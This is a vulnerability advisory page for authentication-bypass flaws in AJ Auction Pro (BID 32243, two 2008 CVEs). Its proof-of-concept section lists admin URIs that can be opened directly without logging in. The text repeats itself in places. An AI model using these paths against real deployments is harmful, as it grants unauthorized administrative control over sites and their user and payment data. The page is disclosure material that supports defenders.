AJ Auction Pro Authentication Bypass Vulnerabilities
BID:32243
Info
AJ Auction Pro Authentication Bypass Vulnerabilities
| Bugtraq ID: | 32243 |
| Class: | Design Error |
| CVE: |
CVE-2008-6966 CVE-2008-6965 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 10 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | G4N0K |
| Vulnerable: |
AJSquare AJ Auction Pro 0 |
| Not Vulnerable: | |
Discussion
AJ Auction Pro Authentication Bypass Vulnerabilities
AJ Auction Pro is prone to multiple authentication-bypass vulnerabilities.
Attackers can exploit these vulnerabilities to gain administrative access to the affected application.
AJ Auction Pro is prone to multiple authentication-bypass vulnerabilities.
Attackers can exploit these vulnerabilities to gain administrative access to the affected application.
Exploit / POC
AJ Auction Pro Authentication Bypass Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available.
http://www.example.com/[path]/admin/user.php
http://www.example.com/[path]/admin/site.php
http://www.example.com/[path]/admin/auction.php
http://www.example.com/[path]/admin/mail.php
http://www.example.com/[path]/admin/fee_setting.php
http://www.example.com/[path]/admin/earnings.php
http://www.example.com/[path]/admin/insertion_fee_settings.php
http://www.example.com/[path]/admin/custom_category.php
http://www.example.com/[path]/admin/subcategory.php
http://www.example.com/[path]/admin/category.php
http://www.example.com/[path]/admin/report.php
http://www.example.com/[path]/amdin/store_manager.php
http://www.example.com/[path]/admin/choose_sell_format.php
Attackers can exploit these issues via a browser.
The following example URIs are available.
http://www.example.com/[path]/admin/user.php
http://www.example.com/[path]/admin/site.php
http://www.example.com/[path]/admin/auction.php
http://www.example.com/[path]/admin/mail.php
http://www.example.com/[path]/admin/fee_setting.php
http://www.example.com/[path]/admin/earnings.php
http://www.example.com/[path]/admin/insertion_fee_settings.php
http://www.example.com/[path]/admin/custom_category.php
http://www.example.com/[path]/admin/subcategory.php
http://www.example.com/[path]/admin/category.php
http://www.example.com/[path]/admin/report.php
http://www.example.com/[path]/amdin/store_manager.php
http://www.example.com/[path]/admin/choose_sell_format.php
Solution / Fix
AJ Auction Pro Authentication Bypass Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].